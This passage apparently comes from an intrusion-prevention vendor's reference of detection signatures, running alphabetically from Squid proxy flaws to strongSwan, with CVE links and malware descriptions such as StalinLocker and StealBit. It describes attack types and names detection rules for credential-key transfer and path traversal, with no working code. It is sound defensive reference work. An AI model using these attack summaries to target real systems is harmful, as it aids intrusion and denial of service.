Situation: File-Text_Squid-Proxy-Esi-Response-Processing-Esi_Assign-Underflow-Denial-Of-Service
References:
CVE-2024-45802
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45802
Back to top

Squid-Proxy-Esi-Response-Processing-Nullpointer-Denial-Of-Service-CVE-2024-45802

About this vulnerability: A vulnerability in Squid Project Squid
Risk: High
First detected in: sgpkg-ips-1848-5242
Last changed: sgpkg-ips-1848-5242
Platform: Generic
Software: Squid
Type: Input Validation
Description: A denial-of-service vulnerability has been reported in Squid Proxy. The vulnerability is due to an input validation error when processing ESI responses. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted ESI response data to the target server. Successful exploitation could result in a denial-of-service condition.
Situation: File-Text_Squid-Proxy-Esi-Response-Processing-Nullpointer-Denial-Of-Service-CVE-2024-45802
References:
CVE-2024-45802
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45802
Back to top

Squid-Proxy-FTP-URI-Processing-Denial-Of-Service

About this vulnerability: Denial of service vulnerability in the Squid proxy server
Risk: Moderate
First detected in: sgpkg-ips-94-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Malfunction
Description: There is a denial of service vulnerability in the Squid proxy server. The vulnerability is exploitable via an HTTP request with a crafted FTP URI.
Situation: HTTP8080_CS-Squid-Proxy-FTP-URI-Processing-Denial-Of-Service
References:
CVE-2007-0247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0247
BID-22079
http://www.securityfocus.com/bid/22079
OSVDB-39839
http://www.osvdb.org/39839
Back to top

Squid-Proxy-Gopher-Response-Processing-Buffer-Overflow

About this vulnerability: A vulnerability in Squid Project Squid
Risk: High
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Buffer Overflow
Description: A buffer overflow vulnerability has exists in the Squid proxy server. The vulnerability is due to an error when parsing long lines in response messages from Gopher requests. An attacker can exploit this vulnerability by setting up a Gopher server to send malicious responses, and sending a request for a URL on the malicious server through the proxy. A successful attack could lead to code execution in the context of the affected service. An unsuccessful attack may lead to abnormal termination of the affected service.
Situation: Generic_SS-Squid-Proxy-Gopher-Response-Processing-Buffer-Overflow
References:
CVE-2011-3205
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3205
BID-49356
http://www.securityfocus.com/bid/49356
OSVDB-74847
http://www.osvdb.org/74847
Back to top

Squid-Proxy-HTCP-Packet-Processing-Denial-Of-Service

About this vulnerability: A denial of service vulnerability in Squid Proxy
Risk: Moderate
First detected in: sgpkg-ips-293-4219
Last changed: sgpkg-ips-1296-5242
Platform: Any Operating System
Software: Squid
Type: Malfunction
Description: There is a denial of service vulnerability in Squid Proxy. A remote attacker can exploit this vulnerability by sending a malicious HTCP request to terminate the affected process, which leads to a denial of service condition.
Situation: Generic_UDP-Squid-Proxy-HTCP-Packet-Processing-Denial-Of-Service
References:
CVE-2010-0639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0639
BID-38212
http://www.securityfocus.com/bid/38212
OSVDB-62297
http://www.osvdb.org/62297
Back to top

Squid-Proxy-HTTP-Chunked-Decoder-Denial-Of-Service

About this vulnerability: A vulnerability in Squid Proxy
Risk: High
First detected in: sgpkg-ips-1710-5242
Last changed: sgpkg-ips-1710-5242
Platform: Generic
Software: Squid
Type: Resource Starvation
Description: A denial-of-service vulnerability has been reported in Squid Proxy. The vulnerability is due to unbounded recursion when handling chunked HTTP messages. Successful exploitation could result in a denial-of-service condition.
Situation: HTTP_SCH-Unusually-Large-Chunk-Extension
References:
CVE-2024-25111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25111
Back to top

Squid-Proxy-HTTP-Header-Parser-Denial-Of-Service

About this vulnerability: An attempt to exploit a vulnerability in Squid Proxy detected
Risk: High
First detected in: sgpkg-ips-1708-5242
Last changed: sgpkg-ips-1708-5242
Platform: Generic
Software: Squid
Type: Input Validation
Description: A vulnerability in Squid Proxy, versions before 6.5, which allows remote attackers to cause a denial of service condition in the target server by sending a crafted request, due to improper user input validation when handling HTTP headers.
Situation: HTTP_CSH-Squid-Proxy-HTTP-Header-Parser-Denial-Of-Service
References:
CVE-2024-25617
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25617
Back to top

Squid-Proxy-HTTP-Message-Processing-Buffer-Overread

About this vulnerability: A vulnerability in Squid Project Squid
Risk: Moderate
First detected in: sgpkg-ips-1692-5242
Last changed: sgpkg-ips-1692-5242
Platform: Generic
Software: Squid
Type: Malfunction
Description: Invalid processing of HTTP messages causes a buffer overread vulnerability in the Squid proxy. A successful exploit can allow an attacker to cause a denial of service condition on the target.
Situation: HTTP_CSH-Squid-Proxy-HTTP-Message-Processing-Buffer-Overread
References:
CVE-2023-49285
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49285
Back to top

Squid-Proxy-HTTP-Request-Processing-Buffer-Overflow

About this vulnerability: A vulnerability in Squid
Risk: Moderate
First detected in: sgpkg-ips-1223-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Buffer Overflow
Description: There has been reported a buffer overflow vulnerability in the Squid proxy. This vulnerability can be exploited by sending a crafted request to the server. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_CRH-Squid-Proxy-HTTP-Request-Processing-Buffer-Overflow
References:
CVE-2020-8450
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8450
Back to top

Squid-Proxy-HTTP-Vary-Header-Handling-Denial-Of-Service

About this vulnerability: A vulnerability in Squid Project Squid
Risk: Moderate
First detected in: sgpkg-ips-1403-5242
Last changed: sgpkg-ips-1403-5242
Platform: Generic
Software: Squid
Type: Malfunction
Description: Invalid processing of HTTP responses causes a denial of service vulnerability in the Squid proxy.
Situation: HTTP_SHS-Squid-Proxy-HTTP-Vary-Header-Handling-Denial-Of-Service
References:
CVE-2021-28662
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28662
Back to top

Squid-Proxy-HTTP-X-Forwarded-For-Header-Handling-Denial-Of-Service

About this vulnerability: A vulnerability in Squid
Risk: High
First detected in: sgpkg-ips-1723-5242
Last changed: sgpkg-ips-1723-5242
Platform: Generic
Software: Squid
Type: Input Validation
Description: A denial-of-service vulnerability has been reported in Squid Proxy. The vulnerability is due to improper user input validation when handling X-Forwarded-For headers. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in a denial-of-service condition.
Situation: HTTP_CSH-Squid-Proxy-HTTP-X-Forwarded-For-Header-Handling-Denial-Of-Service
References:
CVE-2023-50269
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-50269
Back to top

Squid-Proxy-Range-Header-DoS

About this vulnerability: A vulnerability in Squid Proxy Server.
Risk: High
First detected in: sgpkg-ips-1424-5242
Last changed: sgpkg-ips-1424-5242
Platform: Generic
Software: Squid
Type: Malfunction
Description: A vulnerability in Squid Proxy Server, versions 3.0-4.1.4 and 5.0.1-5.0.5, which allows remote attackers to cause a denial of service condition by sending requests with specially crafted Range headers, due to the inability to handle malformed ranges, for both CVE-2021-31806 and CVE-2021-31807.
Situation: HTTP_CSH-Squid-Proxy-Range-Header-DoS
References:
CVE-2021-31806
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31806
Back to top

Squid-Proxy-SNMP-Query-Rejection-Denial-Of-Service

About this vulnerability: A vulnerability in Squid
Risk: Moderate
First detected in: sgpkg-ips-1142-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Resource Starvation
Description: A denial of service vulnerability has been reported in the SNMP component of Squid Proxy. The vulnerability is due to a memory leak in SNMP query rejection code. A remote attacker can exploit this vulnerability by sending a large number of SNMP queries to the target system. Successful exploitation results in the exhaustion of memory, which could lead to denial of service conditions on the target system.
Situation: SNMP-UDP_Squid-Proxy-SNMP-Query-Rejection-Denial-Of-Service
Back to top

Squid-Proxy-SSL-Bump-Certificate-Validation-Bypass

About this vulnerability: A vulnerability in Squid
Risk: Moderate
First detected in: sgpkg-ips-712-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Input Validation
Description: There exists a policy bypass vulnerability in Squid. A remote attacker can use this to for example execute a man-in-the-middle attack.
Situation: HTTPS_SS-TLS-Certificate-Common-Name-Null-Byte-Input-Validation-Error
References:
CVE-2015-3455
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3455
Back to top

Squid-Proxy-String-Processing-Null-Pointer-Dereference

About this vulnerability: A vulnerability in Squid Project Squid
Risk: High
First detected in: sgpkg-ips-376-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Input Validation
Description: A Denial of Service vulnerability exists in Squid Proxy Cache component. The vulnerability is due to an input validation error while parsing crafted strings sent in a request. The vulnerable code does not validate if a string could be NULL before performing a comparison operation. As a result of this, a NULL pointer dereference occurs that leads to a Denial of Service condition.
Situation: HTTP_CSH-Squid-Proxy-String-Processing-Null-Pointer-Dereference
References:
BID-42982
http://www.securityfocus.com/bid/42982
Back to top

Squid-Proxy-Unspecified-DNS-Spoofing-Vulnerability

About this vulnerability: Squid Proxy Unspecified DNS Spoofing Vulnerability.
Risk: High
First detected in: sgpkg-ips-679-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Dns Spoof
Description: A vulnerability exists in Squid 2.5 and earlier that allows remote attackers to spoof DNS lookups if the DNS client port is unfiltered.
Situation: Generic_UDP-Squid-Proxy-Unspecified-DNS-Spoofing-Vulnerability
DNS-UDP_Squid-Proxy-Unspecified-DNS-Spoofing-Vulnerability
References:
CVE-2005-1519
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1519
BID-13592
http://www.securityfocus.com/bid/13592
Back to top

Squid-Proxy-Urn-Response-Processing-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in Squid Project Squid
Risk: Moderate
First detected in: sgpkg-ips-1204-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Buffer Overflow
Description: Improper handling of responses to URN requests causes a heap buffer overflow vulnerability in the Squid proxy. A successful exploit may allow an attacker to execute coed with the privileges of the proxy.
Situation: File-Text_Squid-Proxy-Urn-Response-Processing-Heap-Buffer-Overflow
References:
CVE-2019-12526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12526
Back to top

Squid-Range-Header-Denial-Of-Service

About this vulnerability: A vulnerability in Squid Project Squid
Risk: Moderate
First detected in: sgpkg-ips-604-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Input Validation
Description: A denial of service vulnerability has been reported in Squid. The vulnerability is due to insufficient validation of range headers. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to an affected server. A successful attack will lead to a denial of service condition.
Situation: HTTP_CSH-Squid-Range-Header-Denial-Of-Service
References:
CVE-2014-3609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3609
BID-69453
http://www.securityfocus.com/bid/69453
OSVDB-110525
http://www.osvdb.org/110525
Back to top

Squid-Snmphandleudp-Off-By-One-Buffer-Overflow

About this vulnerability: A vulnerability in Squid Project Squid
Risk: High
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Squid
Type: Buffer Overflow
Description: A code execution vulnerability has been reported in Squid. The vulnerability is due to an off-by-one error resulting in buffer overflow in snmpHandleUdp() function. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to an affected server. A successful attack could lead to arbitrary code execution in the context of the affected application.
Situation: Datalength-UDP_Long-SNMP-Request
References:
CVE-2014-6270
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6270
BID-69686
http://www.securityfocus.com/bid/69686
OSVDB-111286
http://www.osvdb.org/111286
Back to top

Squid-Squoison-Host-Header-Cache-Poisoning

About this vulnerability: A vulnerability in Squid Project Squid
Risk: Moderate
First detected in: sgpkg-ips-768-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Malfunction
Description: Using mismatched hostnames in different parameters of the same request can cause a cache poisoning in the Squid proxy.
Situation: HTTP_CS-Squid-Squoison-Host-Header-Cache-Poisoning
References:
CVE-2016-4553
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4553
Back to top

Squid-SSL-Bump-Denial-Of-Service

About this vulnerability: A vulnerability in Squid Project Squid
Risk: High
First detected in: sgpkg-ips-704-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Integer Overflow
Description: There exists a Denial-Of-Service vulnerability in Squid.
Situation: Generic_CS-Squid-SSL-Bump-Denial-Of-Service
HTTPS_CS-Squid-SSL-Bump-Denial-Of-Service
HTTPS_SS-Squid-SSL-Bump-Denial-Of-Service
Back to top

Squid-Strhdracptlanggetitem-Value-Denial-Of-Service

About this vulnerability: A vulnerability in Squid Project Squid
Risk: Moderate
First detected in: sgpkg-ips-520-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Infinite Loop
Description: There is a denial of service vulnerability in the Squid proxy server. The vulnerability is due to an error when generating an error page. This causes an infinite loop. A remote attacker can exploit this vulnerability by sending a specially crafted HTTP request to a vulnerable server (that is displaying an error page). Authentication may or may not be required depending on the server's configuration. Successful exploitation will cause an infinite loop, which may result in a resource exhaustion denial of service.
Situation: HTTP_CSH-Squid-Strhdracptlanggetitem-Value-Denial-Of-Service
References:
CVE-2013-1839
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1839
BID-58316
http://www.securityfocus.com/bid/58316
OSVDB-90910
http://www.osvdb.org/90910
Back to top

Squid-Strlistgetitem-Denial-Of-Service

About this vulnerability: A vulnerability in Squid Project Squid
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Squid
Type: Malfunction
Description: There is a denial of service vulnerability in the way Squid handles HTTP headers. The vulnerability is due to an infinite loop error when processing HTTP headers containing a specific delimiter character. Remote unauthenticated attackers can exploit this vulnerability by sending specially crafted HTTP request packets containing malicious HTTP headers. Successful exploitation would consume system resources and may cause the service to terminate.
Situation: HTTP_CS-Squid-Strlistgetitem-Denial-Of-Service
References:
CVE-2009-2855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2855
BID-36091
http://www.securityfocus.com/bid/36091
Back to top

Squid-WCCP-Malformed-Message-DoS

About this vulnerability: Denial of service in Squid WCCP message parsing
Risk: Low
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Squid
Type: Malfunction
Description: Squid Web proxy is vulnerable to a denial of service caused by improper checking of user supplied data in the Web Cache Communication Protocol (WCCP) message parsing. A remote attacker could send a malformed WCCP message and cause a denial of service.
Situation: Generic_UDP-Squid-WCCP-Malformed-Message-DoS
References:
CVE-2005-0095
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0095
BID-12275
http://www.securityfocus.com/bid/12275
OSVDB-12886
http://www.osvdb.org/12886
Back to top

Squirrelwaffle-Loader-Infection-Traffic

About this vulnerability: Squirrelwaffle loader traffic was detected
Risk: High
First detected in: sgpkg-ips-1393-5242
Last changed: sgpkg-ips-1393-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Squirrelwaffle loader traffic was detected.
Situation: HTTP_CS-Squirrelwaffle-Loader-Infection-Traffic
Back to top

SR10-FTP-Server-Username-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in SR10 FTP Server
Risk: High
First detected in: sgpkg-ips-642-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SR10 FTP Server
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in SR10 FTP Server 1.1.0.6 in Ricoh DC Software DL-10 4.5.0.1, when the Log file name option is enabled. When an oversized username is given with the USER command, a buffer overflow occurs. If successfully exploited, the attacker can execute arbitrary commands on the server.
Situation: FTP_CS-Oversized-User-Buffer-Overflow
References:
CVE-2012-5002
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-5002
BID-52235
http://www.securityfocus.com/bid/52235
OSVDB-79691
http://www.osvdb.org/79691
Back to top

Srizbi-Spambot

About this vulnerability: Srizbi spambot is a Trojan Horse program used as spamming engine
Risk: High
First detected in: sgpkg-ips-269-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Srizbi spambot
Type: Backdoor
Description: Srizbi spambot is a Trojan Horse program used as a spamming engine.
Situation: HTTP_CS-Srizbi-Spambot
HTTP_CSU-Srizbi-Activity
Generic_CS-Srizbi-Spambot
Back to top

Srng

About this vulnerability: SRNG
Risk: Low
First detected in: sgpkg-ips-615-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SRNG
Type: Misconfiguration
Description: SRNG is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSU-Srng
HTTP_CSH-Srng
Back to top

SRP_RIM-BlackBerry-Enterprise-Server-Router-Denial-Of-Service

About this vulnerability: A denial of service vulnerability in RIM Blackberry Enterprise Server Router
Risk: Low
First detected in: sgpkg-ips-139-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: The RIM BlackBerry Enterprise Server router component suffers from a denial of service vulnerability where a malformed SRP protocol message is parsed incorrectly.
Situation: SRP_CS-RIM-BlackBerry-Enterprise-Server-Router-Denial-Of-Service
References:
CVE-2005-2342
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2342
BID-16100
http://www.securityfocus.com/bid/16100
Back to top

SSH-Private-Key-File-Transfer

About this vulnerability: An SSH Private Key file transfer
Risk: High
First detected in: sgpkg-ips-1555-5242
Last changed: sgpkg-ips-1555-5242
Platform: Any Operating System
Software: <os>
Type: Post Compromise Behaviour
Description: Transfer of an SSH private key over the network was detected.
Situation: Generic_TCP-SSH-Private-Key-File-Transfer
File-Text_SSH-Private-Key-File-Transfer
Generic_CS-SSH-Private-Key-File-Transfer
Back to top

SSH-Version-1.0

About this vulnerability: SSH version 1.0
Risk: Moderate
First detected in: sgpkg-ips-27-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Generic SSH server
Type: Malfunction
Description: SSH version 1.0
Situation: SSH_Version-1.0
Back to top

SSL-Certificate-In-Nonstandard-Port

About this vulnerability: An SSL certificate was detected
Risk: Low
First detected in: sgpkg-ips-421-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Insecure Configuration
Description: An SSL certificate was detected in a nonstandard port
Situation: Generic_SS-SSL-Certificate-In-Nonstandard-Port
TLS_SS-SSL-Certificate-In-Nonstandard-Port
Back to top

SSL-OpenSSL-Get-Shared-Ciphers-Function-Buffer-Overflow

About this vulnerability: OpenSSL server vulnerability in SSL_get_shared-ciphers function
Risk: High
First detected in: sgpkg-ips-81-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Buffer Overflow
Description: A vulnerability exists in the OpenSSL server where client hello messages are not parsed correctly. A carefully crafted SSL client hello message can be used to overflow a buffer in the server, potentially allowing arbitrary code execution. The OpenSSL library is used within many applications, and a successful exploit allows arbitrary code execution with the vulnerable application's privileges.
Situation: HTTPS_CS-OpenSSL-SSLv2-Get-Shared-Ciphers-Function-Buffer-Overflow
HTTPS_CS-OpenSSL-SSLv3-Get-Shared-Ciphers-Function-Buffer-Overflow
References:
CVE-2006-3738
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738
BID-20249
http://www.securityfocus.com/bid/20249
OSVDB-29262
http://www.osvdb.org/29262
Back to top

Ssl-PCT-Buffer-Overflow

About this vulnerability: Buffer overflow in Microsoft's PCT implementation
Risk: Critical
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS; Exchange Server
Type: Buffer Overflow
Description: Buffer overflow in Microsoft's PCT implementation can be exploited to execute arbitrary commands on the target host with superuser privileges. As the flaw is in Microsoft's SSL library, multiple applications are affected by this vulnerability.
Situation: Generic_Ssl-PCT-Buffer-Overflow
SMTP_Exchange-Ssl-PCT-Buffer-Overflow
HTTPS_CS-IIS-Ssl-PCT-Buffer-Overflow
References:
CVE-2003-0719
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0719
BID-10116
http://www.securityfocus.com/bid/10116
MS04-011
http://technet.microsoft.com/security/bulletin/MS04-011
Back to top

SSLv3-Library-DoS

About this vulnerability: Vulnerability in SSL library affects multiple applications
Risk: Moderate
First detected in: sgpkg-ips-11-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS
Type: Malfunction
Description: SSL library included in Microsoft Windows can be remotely crashed by sending a specially crafted packet. This affects all applications that use the vulnerable SSL library.
Situation: HTTPS_CS-IIS-Ssl-Library-Malformed-Client-Hello-DoS
Generic_LDAP-Ssl-Library-Malformed-Client-Hello-DoS
TLS_CS-LDAP-Ssl-Library-Malformed-Client-Hello-DoS
References:
CVE-2004-0120
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0120
BID-10115
http://www.securityfocus.com/bid/10115
MS04-011
http://technet.microsoft.com/security/bulletin/MS04-011
Back to top

SSReader-ActiveX-Control-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in SSReader ActiveX control
Risk: High
First detected in: sgpkg-ips-187-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: SSReader
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in SSReader ActiveX Control. Superstar SSReader is a electronic book (e-book) application. The ActiveX control included within the reader contains a buffer overflow in a specific method which may allow arbitary code execution in the context of the current user.
Situation: HTTP_SS-SSReader-ActiveX-Control-Buffer-Overflow
File-Text_SSReader-ActiveX-Control-Buffer-Overflow
References:
CVE-2007-5807
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5807
BID-26247
http://www.securityfocus.com/bid/26247
OSVDB-40230
http://www.osvdb.org/40230
Back to top

Stagil-Navigation-For-JIRA-Path-Traversal-Vulnerabilities

About this vulnerability: Multiple vulnerabilities in Stagil Navigation for Jira
Risk: High
First detected in: sgpkg-ips-1650-5242
Last changed: sgpkg-ips-1650-5242
Platform: Generic
Software: Stagil Navigation for Jira
Type: Directory Traversal
Description: Path traversal vulnerabilities CVE-2023-26255 and CVE-2023-26256 have been reported for STAGIL Navigation for Jira. An unauthenticated attacker can use these vulnerabilities to read arbitrary files on the Jira server.
Situation: HTTP_CRL-Stagil-Navigation-For-JIRA-Path-Traversal-Vulnerabilities
References:
CVE-2023-26255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26255
Back to top

StalinLocker-Wiper-Binary-File

About this vulnerability: StalinLocker wiper binary file was detected
Risk: High
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: StalinLocker (also known as StalinScreamer) is a propagandist wiper. After infection, it gives 6 minutes time window to the user to enter the correct key. If the correct code isn't entered, all drives are wiped.
Situation: File-Exe_StalinLocker-Wiper-Binary-File
Back to top

Star-Blizzard-Malicious-Traffic

About this vulnerability: Traffic generated by Star Blizzard infrastructure
Risk: High
First detected in: sgpkg-ips-1678-5242
Last changed: sgpkg-ips-1678-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Traffic that matches a known Star Blizzard APT pattern has been detected.
Situation: File-Text_Star-Blizzard-Collect-and-Send-User-Data-POST-Request
Back to top

StartTLS-Usage

About this vulnerability: A vulnerability in HP SiteScope
Risk: Moderate
First detected in: sgpkg-ips-479-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Insecure Configuration
Description: StartTLS usage was detected
Situation: SMTP_StartTLS
IMAP_StartTLS
POP3_StartTLS
Back to top

STARWHALE-Malware-C2-Traffic

About this vulnerability: STARWHALE malware C2 traffic
Risk: High
First detected in: sgpkg-ips-1440-5242
Last changed: sgpkg-ips-1440-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: An HTTP request that matches a known STARWHALE malware command and control traffic pattern was detected.
Situation: HTTP_CS-STARWHALE-Malware-C2-Traffic
File-Text_STARWHALE-Malware-C2-Traffic
Back to top

StealBit-Malware-Infection-Traffic

About this vulnerability: StealBit malware infection traffic
Risk: High
First detected in: sgpkg-ips-1433-5242
Last changed: sgpkg-ips-1433-5242
Platform: Windows; Linux
Software: <os>
Type: Backdoor
Description: StealBit is a malware used for data exfiltration by LockBit ransomware group.
Situation: HTTP_CS-StealBit-Malware-Infection-Traffic
Back to top

Stealc-Stealer-Infection-Traffic

About this vulnerability: Stealc stealer infection traffic
Risk: High
First detected in: sgpkg-ips-1560-5242
Last changed: sgpkg-ips-1560-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: An HTTP request that matches Stealc information stealer command and control traffic patterns was detected. This might indicate that the system from where the traffic originated is compromised.
Situation: HTTP_CRL-Stealc-Stealer-Infection-Traffic
Back to top

Stegosploit

About this vulnerability: Stegosploit
Risk: Moderate
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: Stegosploit toolkit provides methods for delivering exploits over image files using steganography.
Situation: File-JPEG_HTML-Inside-JPEG-File
File-JPEG_Script-Inside-JPEG-File
File-PNG_HTML-Inside-PNG-File
File-PNG_Script-Inside-PNG-File
Back to top

Store-Cgi-Directory-Traversal

About this vulnerability: ES.One store.cgi directory traversal
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1639-5242
Platform: Red Hat Linux 7
Software: ES.One
Type: Directory Traversal
Description: The ES.One 1.0 store.cgi script contains an input validation vulnerability that allows the attacker to view any file on the system and list the contents of any directory.
Situation: HTTP_CSU-Dot-Dot-Slash-And-Null-Byte-Sequence
References:
CVE-2001-0305
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0305
BID-2385
http://www.securityfocus.com/bid/2385
Back to top

Storm-Bot

About this vulnerability: Storm bot
Risk: High
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Storm is a Windows bot that can be remote controlled. Storm is able to perform various tasks, including a distributed denial of service (DDoS) attacks.
Situation: HTTP_CSH-Storm-Bot-Activity
Back to top

Streamcast-0.9.75-Buffer-Overflow

About this vulnerability: Streamcast 0.9.75 And Earlier Stack Based Buffer Overflow
Risk: High
First detected in: sgpkg-ips-648-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Streamcast
Type: Buffer Overflow
Description: A stack based buffer overflow vulnerability in Streamcast 0.9.75 and earlier which allows attackers to remotly execute arbitrary code via an overly long User Agent parameter.
Situation: Generic_CS-Streamcast-0.9.75-Buffer-Overflow
References:
CVE-2008-0550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0550
BID-33898
http://www.securityfocus.com/bid/33898
OSVDB-42670
http://www.osvdb.org/42670
Back to top

StrongSwan-Certificate-And-Identification-Payload-Parsing-Buffer-Overflow

About this vulnerability: A vulnerability in strongSwan
Risk: High
First detected in: sgpkg-ips-672-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: strongSwan
Type: Buffer Overflow
Description: A code execution vulnerability exists on strongSwan. The vulnerability is due to improper use of snprintf() when parsing certificates and Identification Payload. Remote attackers could exploit this vulnerability via a specially crafted certificate or identification payload. Successful exploitation would allow injection and execution of arbitrary code in the context of user root. Unsuccessful code injection attempts would cause termination of the pluto IKE daemon resulting in a denial of service condition.
Situation: Generic_CS-StrongSwan-Certificate-And-Identification-Payload-Parsing-Buffer-Overflow
References:
CVE-2010-2628
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2628
BID-42444
http://www.securityfocus.com/bid/42444
Back to top

StrongSwan-Gmp-Plugin-Denial-Of-Service

About this vulnerability: A vulnerability in strongSwan
Risk: High
First detected in: sgpkg-ips-1000-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: strongSwan
Type: Input Validation
Description: There exists a denial-of-service vulnerability in strongSwan.
Situation: Generic_UDP-StrongSwan-Gmp-Plugin-Denial-Of-Service
References:
CVE-2017-11185
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11185
Back to top

StrongSwan-OpenSSL-Plugin-Fips-Mode-Denial-Of-Service

About this vulnerability: A vulnerability in strongSwan strongSwan
Risk: Moderate
First detected in: sgpkg-ips-1137-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: strongSwan
Type: Malfunction
Description: A denial-of-service vulnerability has been reported in strongSwan. The vulnerability is due to improper handling of return values from the OpenSSL plugin when used in FIPS mode and non-FIPS approved PRF algorithms are negotiated during IKEv2 key derivation. A remote attacker could exploit this vulnerability by sending a crafted message to a vulnerable server. Successful exploitation of this vulnerability could result in denial-of-service conditions on the target server.
Situation: Generic_UDP-IKEv2-IKE_Sa_Init-Using-PRF_GMAC_md5
Generic_UDP-StrongSwan-OpenSSL-Plugin-Fips-Mode-Denial-Of-Service
References:
CVE-2018-10811
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10811
Back to top

StrongSwan-Rsassa-Pss-Signature-Denial-Of-Service

About this vulnerability: A vulnerability in strongSwan strongSwan
Risk: Moderate
First detected in: sgpkg-ips-1050-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: strongSwan
Type: Malfunction
